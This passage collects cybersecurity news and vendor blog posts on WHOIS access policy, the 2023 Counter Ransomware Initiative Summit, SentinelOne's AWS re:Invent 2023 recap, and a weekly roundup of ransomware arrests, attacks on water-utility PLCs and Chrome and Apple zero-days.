The registrar community generally views public WHOIS data as a nuisance issue for their domain customers and an unwelcome cost-center. Privacy advocates maintain that cybercriminals don’t provide their real information in registration records anyway, and that requiring WHOIS data to be public simply causes domain registrants to be pestered by spammers, scammers and stalkers.

Meanwhile, security experts argue that even in cases where online abusers provide intentionally misleading or false information in WHOIS records, that information is still extremely useful in mapping the extent of their malware, phishing and scamming operations. What’s more, the overwhelming majority of phishing is performed with the help of compromised domains, and the primary method for cleaning up those compromises is using WHOIS data to contact the victim and/or their hosting provider.

Anyone looking for copious examples of both need only to search this Web site for the term “WHOIS,” which yields dozens of stories and investigations that simply would not have been possible without the data available in the global WHOIS records.

KrebsOnSecurity remains doubtful that participating registrars will be any more likely to share WHOIS data with researchers just because the request comes through ICANN. But I look forward to being wrong on this one, and will certainly mention it in my reporting if the RDRS proves useful.

Regardless of whether the RDRS succeeds or fails, there is another European law that takes effect in 2024 which is likely to place additional pressure on registrars to respond to legitimate WHOIS data requests. The new Network and Information Security Directive (NIS2), which EU member states have until October 2024 to implement, requires registrars to keep much more accurate WHOIS records, and to respond within as little as 24 hours to WHOIS data requests tied to everything from phishing, malware and spam to copyright and brand enforcement.

The 2023 Counter Ransomware Initiative Summit | Stepping Up Global Collaboration in Cybersecurity

Ransomware’s transformation from a targeted cybercrime to a significant threat to national security has increasingly drawn attention at international forums like the Counter Ransomware Initiative (CRI) Summit. The 2023 Summit, which brought together representatives from 50 countries, signifies a growing, yet cautious, acknowledgment of the need for collaborative strategies in tackling this complex issue.

In this post, we discuss the key findings emerging from the Summit, shedding light on the collective approach adopted by nations to combat the surge in ransomware attacks. We’ll delve into the role of advancing technologies such as Artificial Intelligence (AI) in fortifying cybersecurity measures, the pivotal role of information sharing in preempting attacks, and the strategic policy initiatives aimed at undermining the operational frameworks of ransomware syndicates.

Furthermore, we’ll reflect on the real-world challenges in countering adaptive cyber threats and highlight the recent law enforcement breakthroughs against notable ransomware groups. This post explores the steps being taken at an international level to address the ransomware menace and the ongoing efforts to shape a more resilient global cybersecurity infrastructure.

Building Collective Resilience Against Ransomware

Member countries gathered in Washington D.C. on October 31 to November 1 to reinforce the need for a global front against the escalating ransomware crisis. Some of the key areas of discussion to emerge were:

  • Strengthening International Cooperation to Undermine Ransomware Operations:
    • The Summit emphasized the importance of unified efforts across nations. Recognizing that ransomware networks often transcend borders, it called for enhanced cross-border law enforcement collaboration.
    • Delegates discussed the standardization of legal frameworks and law enforcement protocols to ensure swift and coordinated action against ransomware syndicates.
    • The Summit also highlighted the need for streamlined processes for sharing intelligence and cyber forensics across countries to facilitate faster identification and neutralization of ransomware threats.
  • Tackling the Financial Underpinnings of the Ransomware Ecosystem:
    • A lot of discussion centered on disrupting the financial networks that fuel ransomware operations.
    • Experts and policymakers deliberated on strategies to trace and block the flow of ransom payments, which often involve cryptocurrencies and unregulated digital payment platforms.
    • There was a consensus on increasing collaboration with financial institutions and regulatory bodies to monitor and report suspicious transactions linked to ransomware activities.
  • Enhancing Public-Private Partnerships to Combat Ransomware Threats:
    • Recognizing the critical role of the private sector, particularly technology and cybersecurity firms, the Summit pushed for stronger partnerships between governments and private entities.
    • Discussions were held on creating frameworks for regular information exchange and threat intelligence sharing between public agencies and private companies.
    • The Summit also saw proposals for joint initiatives in developing advanced cybersecurity technologies, focusing on AI and machine learning, to stay ahead of ransomware tactics.

The Summit’s approach to building collective resilience against ransomware was multi-dimensional, acknowledging that tackling such a complex issue requires a blend of legal, financial, technological, and cooperative strategies. Concerted effort is needed to create a more robust and unified defense against the burgeoning threat of ransomware, which continues to challenge global security and economic stability.

The Evolving Role of AI in Cybersecurity

During the event, a significant spotlight was cast on using Artificial Intelligence (AI) and Machine Learning (ML) in the fight against ransomware. This focus underscores a broader shift in cybersecurity tactics, moving towards more proactive and adaptive defense mechanisms.

AI and ML: Enhancing Threat Detection and Response

  • Advanced Threat Detection: AI and ML algorithms can sift through vast data, identifying patterns and anomalies that may indicate a cybersecurity threat. This allows for early detection of potential ransomware attacks, even before they fully manifest.
  • Automated Response Systems: Integrating AI into cybersecurity systems creates the potential for automated responses to detected threats. This not only speeds up the reaction time but also helps mitigate the impact of attacks, especially in scenarios where every second counts.
  • Adapting to Evolving Threats: The dynamic nature of cyber threats, particularly ransomware, requires tools that can adapt and evolve. AI systems, with their learning capabilities, are well-positioned to meet this need. However, the effectiveness of these AI models in real-world applications is a continuous journey of refinement and improvement, given the ever-advancing tactics of cybercriminals.

Sharing Information | Building a Proactive Defense Network

The CRI Summit also underscored the importance of information sharing in building a collective defense against ransomware.

Rapid Exchange of Threat Data

  • International Information Sharing Platforms: The establishment of platforms for quick and efficient sharing of threat intelligence among CRI members is a step towards a more unified global response to cyber threats.
  • Enhancing Anticipatory Capabilities: With timely access to shared intelligence, countries and organizations can better anticipate and prepare for potential ransomware attacks.
  • Real-World Application: The true test of these information-sharing initiatives lies in their implementation and effectiveness in diverse real-world scenarios. Ensuring these platforms are accessible, efficient, and secure will be crucial in maximizing their impact.

Policy Initiatives and Ransomware Financing | Striking at the Core

A key outcome of the Summit was the formulation of decisive policy initiatives aimed at disrupting the financial lifeline of ransomware operations.

Disincentivizing Ransom Payments

  • No Ransom Payments: The CRI’s collective stance against paying ransoms aims to weaken the financial incentive for cybercriminals. This policy needs global support and enforcement to be effective.
  • Tracking Illicit Financial Transactions: The U.S. Treasury’s commitment to monitor and share information on illicit financial transactions is a strategic move to disrupt the economic foundations of ransomware operations.
  • Global Enforcement Challenges: Implementing these policies on a global scale presents challenges, particularly in jurisdictions with varying levels of cybercrime laws and enforcement capabilities. The effectiveness of these initiatives hinges on the cooperative efforts and compliance of all member states of the CRI.

Discussions highlighted the need for collective effort against ransomware, underscored the importance of AI in cybersecurity, the power of shared intelligence, and the need for robust policy measures. As these strategies are implemented, their real-world effectiveness and adaptability will play a crucial role in shaping the global response to the ransomware threat.

Conclusion

The 2023 Counter Ransomware Initiative (CRI) Summit marks a step in the right direction towards global collaboration against cyber threats. However, the reality remains that many organizations and critical infrastructures are still vulnerable, continuing to fuel the ransomware industry. Despite the advancements and strategic discussions at the Summit, the prevalence of these threats highlights the urgent need for comprehensive and proactive measures.

At SentinelOne, we have been harnessing the power of AI and machine learning for over a decade, staying ahead in the cybersecurity landscape. These technologies, crucial in the fight against ransomware, must be complemented by a stronger alliance between private and public sector leaders. Setting a new standard in cybersecurity and working towards eliminating ransomware as a viable attack method requires a unified effort that transcends individual strategies and recommendations.

If you are ready to experience the advanced protection that SentinelOne offers, our dedicated team is here to assist you. Request a demo and see firsthand how our solutions can safeguard your digital landscape against the evolving cyber threats of today and tomorrow.


AWS re:Invent 2023 Highlights | Showcasing the Latest Advances in Cloud Security and Innovation

Last week’s AWS re:Invent 2023, held in Las Vegas, was a milestone event showcasing the latest innovations in cloud security. This year, the focus was on the transformative role of Generative AI in cloud computing, a theme that resonated throughout the conference’s keynotes, breakout sessions, and hands-on labs.

In this post, we unpack the essential takeaways from AWS re:Invent 2023. We explore the significant advancements in AI and machine learning (ML) and delve into some of the important new integrations and collaborations announced.

The Rise of Generative AI in Cloud Computing

The standout theme at AWS re:Invent 2023 was unmistakably Generative AI, encapsulated by AWS CEO Adam Selipsky’s keynote. The introduction of Amazon Q marked a significant milestone: a generative AI-powered assistant designed to revolutionize how businesses operate across various sectors. Additionally, the launch of Guardrails for Amazon Bedrock represents a commitment to ensuring the secure and responsible scaling of generative AI applications.

In his keynote, Adam explored AWS’s strategic vision to leverage Generative AI across three key areas:

  1. Infrastructure for AI Training and Inference: Highlighting the need for robust infrastructure to support AI and ML models, AWS offers solutions to cater to fluctuating demands and ensure high-performance outcomes.
  2. Tools for Building with Large Language Models (LLMs): AWS is investing in tools that enable seamless integration and utilization of LLMs and foundational models (FMs) in cloud computing.
  3. AI-Driven Applications: The focus here is on creating applications that leverage FMs, tailoring AI to meet specific business needs and operational requirements.

SentinelOne at AWS re:Invent | Educating on AI in Cloud Security

SentinelOne played a pivotal role at AWS re:Invent with a compelling breakout session led by Field CISO Mani Keerthi Nagothu and Technical Field Leader Jeremy “Howie” Howerton.

Their presentation, “The Challenges of AI in Cloud Security,” provided an in-depth look at AI models, their practical applications in cloud security, and best practices for solution evaluation. The session also featured a real-world case study on a ransomware attack, showcasing SentinelOne’s expertise and drawing a highly engaged audience.

SentinelOne and Snyk Integration | Enhancing Cloud-Native Application Security

The recently announced collaboration between SentinelOne and Snyk is more than just a technological advancement; it’s a strategic move towards closing the loop in cloud-native application security. By covering both the build and runtime aspects of application security, this partnership ensures a more robust and resilient security posture for cloud-native applications.

The value and depth of this partnership to both developer and security teams were validated by re:Invent attendees, with the technical demos and joint talks in both the SentinelOne and Snyk booths at capacity.

Snyk’s role in this partnership focuses on the early stages of application development. Its Container image vulnerability scanning empowers developers and DevOps teams to detect and prioritize vulnerabilities right from the outset.

By embedding security into the DevOps pipeline, Snyk Container ensures that potential vulnerabilities are addressed before the application goes live, effectively minimizing risks in the production environment. This proactive approach is crucial in today’s fast-paced development cycles, where security can no longer be an afterthought.

Real-Time Threat Detection and Response with SentinelOne’s CWPP and Cloud Data Security

SentinelOne has lots to offer when it comes to DevOps-friendly security for cloud environments, with both workload and cloud data security options being showcased at re:Invent. By focusing on simple, cloud-native deployment approaches, backed by powerful detection engines and deep threat hunting capabilities, these solutions caught the attention of attendees. Complementing Snyk’s build-time focus, SentinelOne’s CWPP comes into play during the application’s runtime. It excels in identifying and mitigating real-time threats such as ransomware, zero-day exploits, and advanced persistent threats.

The spotlight on SentinelOne’s CWPP at AWS re:Invent underscores its importance in the current cybersecurity landscape. As organizations increasingly migrate to the cloud and embrace digital transformation, the need for robust, real-time security solutions becomes paramount.

SentinelOne’s CWPP offers a powerful, flexible, and intelligent solution to protect cloud workloads against a wide array of cyber threats, making it an essential tool for businesses looking to secure their cloud infrastructure.

For organizations looking to enhance their cloud security posture, exploring the capabilities of SentinelOne’s CWPP could be a critical step towards achieving a secure and resilient cloud infrastructure.

SentinelOne’s Singularity Cloud Data Security is a newer offering, with options to provide automated malware scanning for Amazon S3 and NetApp, directly in the customer’s environment. This solution helps customers identify suspicious and malicious files within their environment, and can remove and quarantine them quickly. With most modern applications leveraging S3, it’s critical for organizations to protect applications (both those using the buckets and those downstream) from threats within their storage.

Visibility of resources, especially when they are being spun up and spun down quickly, and data sovereignty were common topics of discussion when it came to protecting cloud data. Cloud Data Security addresses visibility by inventorying all S3 buckets connected to an account, and by applying policy-based controls and rules at time of creation. When it comes to data sovereignty, SentinelOne does all scanning of the objects within the customer’s bucket; the object never leaves their environment, meeting key guidelines and regulations for many industries.

Networking and Entertainment | Fostering Connections and Fun

AWS re:Invent 2023 wasn’t just about the latest in cloud technology; it also offered ample opportunities for networking and entertainment. The event’s social highlight was the after-party at Juliet Cocktail Lounge, co-hosted with tech partners like Snyk and NinjaOne. This event stood out for its great music, engaging discussions, and a chance for attendees to relax and network in a more informal setting.

Additionally, the “Take the Wheel On Your AWS Applications” event provided a unique and interactive experience outside the usual conference environment, while the Recovery Breakfast at The Yardbird offered a quieter but equally engaging atmosphere for morning discussions. These events underscored the importance of balancing professional learning with fun and networking at tech conferences.

Booth Highlights | SentinelOne’s Showcase of Innovation

SentinelOne’s presence at AWS re:Invent 2023 was marked by a flurry of innovation and expertise, with the booth emerging as a focal point of technological showcase. The booth functioned as a hub of activity with a series of informative presentations, demonstrations, and interactive sessions that highlighted SentinelOne’s leading role in cloud security and AI.

In-Depth Session on Purple AI

Holly Bittinger’s talk on Purple AI delved into the nuances of Purple AI, explaining how it accelerates threat investigations and simplifies security operations.

Purple AI allows analysts to identify, analyze, and mitigate threats using conversational prompts and interactive dialog, leveraging large language models (LLMs) to supercharge threat detection and response. By demonstrating Purple AI’s capabilities, Holly showcased SentinelOne’s commitment to enhancing AI’s role in cybersecurity.

Snyk and SentinelOne Integration | A Practical Demo

The integration between Snyk and SentinelOne was another highlight, drawing attention to their collaborative efforts in cloud-native application security. The live demonstration provided a practical insight into how the integration enhances security from build-time to runtime, effectively addressing cloud vulnerabilities through an in-depth analysis of the IceFire ransomware attack.

The demonstration offered attendees a glimpse into the complexities of modern cybersecurity challenges and SentinelOne’s adeptness in addressing them.

Singularity Cloud Demos | Cloud Rogues and eBPF

The Singularity Cloud demos were exceptionally popular, attracting a large audience interested in the latest cloud security innovations. These demos highlighted key features such as Cloud Rogues and the benefits of extended Berkeley Packet Filter (eBPF), emphasizing SentinelOne’s forward-thinking approach in cloud security.

The interactive nature of these demos allowed attendees to experience firsthand the efficiency and effectiveness of SentinelOne’s solutions. Participants gained valuable insights into how SentinelOne’s technologies can be applied in various scenarios, offering practical knowledge that goes beyond theoretical understanding.

Looking Ahead | Continuing the Cloud Security Conversation

AWS re:Invent 2023 was a fantastic experience showcasing the convergence of innovation and community in cloud technology. We’re already looking forward to next year’s AWS re:Invent and the opportunity to connect again with the cloud computing community.

Looking forward, we’re excited to continue exploring the evolving landscape of cloud security. Join us at our upcoming webinar on December 14th for an in-depth look at the latest trends, particularly the impact of AI in cloud security.

Contact us to learn more about what SentinelOne is doing to evolve the cyber defense industry or book a demo to get more in-depth experience with our newest integrations and security offerings.

Navigating the AI-Driven Landscape of Cloud Security | Trends and Insights
Thursday, December 14 at 10:00 a.m. PST / 1:00 p.m. EST

The Good, the Bad and the Ugly in Cybersecurity – Week 48

The Good | Ukrainian Ransomware Gang Busted By Cyber Cops

A ransomware gang operating out of Kyiv, Ukraine has been taken down by European police, it was announced this week. It is estimated the gang had attacked more than 250 servers across 71 countries during its active lifetime and caused losses of several hundred million euros.

A joint police task force raided 30 locations and seized over a hundred devices, resulting in the arrest of four individuals and the alleged ringleader of the gang. Europol said that the gang broke into networks using phishing emails, brute force attacks, SQL injection and stolen credentials. Once inside a network, they deployed tools such as Cobalt Strike and TrickBot to further their access. They would then remain hidden, sometimes for months, before deploying various kinds of malware, including LockerGoga, MegaCortex, HIVE and Dharma ransomware to lock files and extract payment from victims.

The gang ransomed multiple global organizations located in France, Norway, Germany, The Netherlands, Canada and the U.S. In one example, they demanded 450 BTC (around $17m today) from a leading chemical company in the Netherlands.

The raids, which took place on November 21, were part of a long-standing operation that began in 2019 to identify and disrupt cyber criminal activity in Ukraine. Previous arrests in 2021 led authorities to develop decryptors for some of the gang’s ransomware tools. The operation continues as authorities continue to hunt for other associates of the arrested suspects.

The Bad | Hacktivists Target U.S. Water Treatment Plants

CISA is warning critical infrastructure organizations to be on the alert this week after Iranian-backed threat actors were found to be attacking U.S. water treatment plants and other organizations with embedded Unitronics PLCs.

A Pro-Hamas “Hacktivist” group calling itself “Cyber Av3ngers” has perpetrated intrusions into a number of U.S. organizations by exploiting weak or default passwords in the Israeli-made ICS devices. Aliquippa’s Municipal Water Authority was breached by the threat actor as was a brewery in Pittsburgh. The attackers use network scanning tools to hunt for vulnerable devices connected to the public internet and then attempt to brute force entry through known or weak passwords.

Source: BeaverCountain.com

Cyber Av3ngers is known to be an arm of the Iranian IRGC, with a history of attacking industrial targets in relatively unsophisticated attacks. It makes much use of social media to broadcast sometimes false and often exaggerated claims about high-profile hacks. It has been suggested that the group’s social media persona is linked to another threat actor known as Soldiers of Solomon. Other groups that appear to be conducting campaigns against industrial infrastructure include GhostSec.

Although the damage caused in the cases seen so far appears to have been minimal and mitigation relatively quick, the fact that critical infrastructure appears to be easily compromised and is currently being targeted by active groups is a cause for concern. CISA advises all admins of embedded industrial control systems to change default settings, use strong passwords and take other mitigating measures as outlined here.

The Ugly | 3 More Zero Days Found in Chrome & Apple OSes

It’s that time of the month again. Not quite ‘Patch Tuesday’, but the increasingly frequent warning “Apple is aware of a report” that a new zero day (or two) “may have been exploited” in the wild is upon us once more. Users are being urged to update all their Apple things – and Chrome too, while they’re at it – after Google’s TAG team reported three critical severity zero days in its own and Apple’s products.

Tuesday saw Google release patches for seven vulnerabilities in Chrome including CVE-2023-6345. Few details were disclosed about the bug other than that it involves an integer overflow in the Skia Graphics Engine. Skia is used in Chrome to handle tasks such as drawing shapes, text and images on web pages. What Google did say, importantly, is that it was “aware that an exploit for CVE-2023-6345 exists in the wild.”

Meanwhile, on Thursday, Apple issued updates across its desktop and mobile platforms for two vulnerabilities in its WebKit browser engine. On Apple’s mobile platforms, WebKit is used by all browsers, not just Safari. CVE-2023-42916 is an out-of-bounds read issue that could be used to leak sensitive information when processing web content. CVE-2023-42917 is a memory corruption bug that could result in arbitrary code execution when processing web content.

Both flaws were credited to the same Google TAG researcher who reported CVE-2023-6345, suggesting that their discovery was linked. Apple said it was aware of reports that the bugs may have been exploited against versions of iOS before 16.7.1.

As 2023 begins to draw to a close, it’s worth noting that it’s been a record year for Apple zero days, with 19 reported as being ‘actively exploited’ in the wild to date. It’s a sign not only of the company’s products’ popularity but also of their vulnerability.

Apple’s closed mobile ecosystem makes malware detection and remediation challenging for even the most technical of users, while many among its macOS user base still subscribe to the outdated thinking that ‘Macs don’t get malware’. Such folks need to update both their devices and their understanding of the modern cyber threat landscape if they wish to avoid calamity down the road.